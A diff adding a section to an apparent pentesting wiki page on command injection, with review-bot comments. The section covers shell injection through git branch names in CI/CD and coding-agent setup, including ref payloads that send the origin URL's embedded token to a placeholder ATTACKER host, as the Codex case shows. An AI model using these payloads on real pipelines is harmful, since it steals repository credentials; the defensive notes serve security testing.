diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 41a11880d6a..d2f6c2008a9 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md 
@@ -266,6 +266,61 @@ java.lang.Runtime.getRuntime().exec(cmd); - Swap the callback for a reverse shell; if the UI/PoC cannot handle pipes/redirects, stage a payload with one command and exec it with a second request. - Horizon3's [CVE-2023-27350.py](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) automates the auth bypass, config flips, command execution, and rollback—run it through an upstream proxy (e.g., `proxychains` → Squid) when the service is only reachable internally. +## Git branch/ref name injection in CI/CD, code review and coding-agent setup + +Some automation platforms accept a **repository + branch/ref** and later interpolate that value into a **shell command** during checkout, setup, review, or deployment. If the branch/ref reaches a shell without strict allowlisting or safe argument separation, **Git metadata becomes a command injection primitive**. + +Typical vulnerable patterns: + +- `git fetch origin $BRANCH` +- `git checkout $REF` +- `sh -c "git fetch origin $branch && git checkout $branch"` +- setup wrappers that log, clone, or review `refs/heads/...` values inside Bash + +This matters in **CI/CD**, **GitHub Actions helpers**, **self-hosted review bots**, and **cloud coding agents** because branch names are often attacker-controlled in fork/PR workflows or by anyone who can create refs in the repo. + +### What to test + +1. Create a benign-looking branch name that should break command parsing, such as `-1`, and verify whether checkout/setup logs show syntax or git errors. +2. If spaces are blocked by the Git provider, replace them with `${IFS}` so Bash recreates whitespace at execution time. +3. Try shell metacharacters and command substitution inside the ref: + +```bash +main;id; +main;curl${IFS}http://ATTACKER/$(whoami); +main;curl${IFS}http://ATTACKER/`git${IFS}remote${IFS}get-url${IFS}origin`; +``` + +4. 
If the UI truncates or visually hides branch names, test Unicode padding or unusual whitespace to disguise the payload while keeping the shell-relevant bytes intact. + +### High-value post-exploitation target: authenticated git remotes + +During early clone/setup stages, many systems temporarily configure `origin` with an embedded **PAT/OAuth token / installation token**: + +```bash +git remote get-url origin +``` + +If command execution lands **before the token is removed/redacted**, this often leaks credentials that can be reused against GitHub/GitLab/Bitbucket or the CI provider itself. + +Common exfiltration paths: + +- Write the remote URL to a file and coerce the agent/review task to print that file later. +- Send it directly to attacker infrastructure: + +```bash +main;curl${IFS}http://ATTACKER/`git${IFS}remote${IFS}get-url${IFS}origin`; +``` + +- Read task history/log APIs if the platform exposes backend endpoints that return job output without requiring UI interaction. + +### Practical notes + +- Branch restrictions are not enough. Git providers may block literal spaces but still allow strings such as `${IFS}`, metacharacters, or Unicode separators that become dangerous only when evaluated by a shell. +- This is especially dangerous when the malicious branch is set as the **default branch** or used in **automated code review** flows, because every victim job becomes a trigger. +- If the application uses `execve`/`subprocess.run([...])`/`execFile()` with each argument split safely, ref names stop being shell syntax and the bug usually disappears. +- If you are testing CI/CD abuse more broadly, see [Pentesting CI/CD](https://cloud.hacktricks.wiki/en/pentesting-ci-cd/pentesting-ci-cd-methodology.html). + ## Brute-Force Detection List 
@@ -287,5 +342,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html) - [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) - [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/) +- [BeyondTrust: How Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise](https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token) {{#include ../banners/hacktricks-training.md}}
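Review bot: In the "Practical notes" list of the first hunk (`@@ -266,6 +266,61 @@`), the bullet stating that `execve`/`subprocess.run([...])`/`execFile()` makes the bug "usually" disappear leaves out the case that step 1 of "What to test" itself probes: a ref such as `-1` is still parsed by git as an option even when no shell is involved. Suggest extending that bullet to say the ref should be validated before use (for example with `git check-ref-format --branch`) and passed after `--end-of-options` where the installed git supports it, or as a fully qualified `refs/heads/...` name, so the section gives the complete fix rather than only the shell-separation half. The hedge "usually" could then be replaced by naming this remaining argument-injection case explicitly.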
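Review bot: In the references hunk (`@@ -287,5 +342,6 @@`), the new BeyondTrust entry is the only place the OpenAI Codex case is named; nothing in the added "Git branch/ref name injection" section points to it. Suggest mentioning the write-up once in that section's introduction so readers can tell which observations (the token embedded in `origin`, the `${IFS}` substitution for blocked spaces) come from that source and which are general guidance.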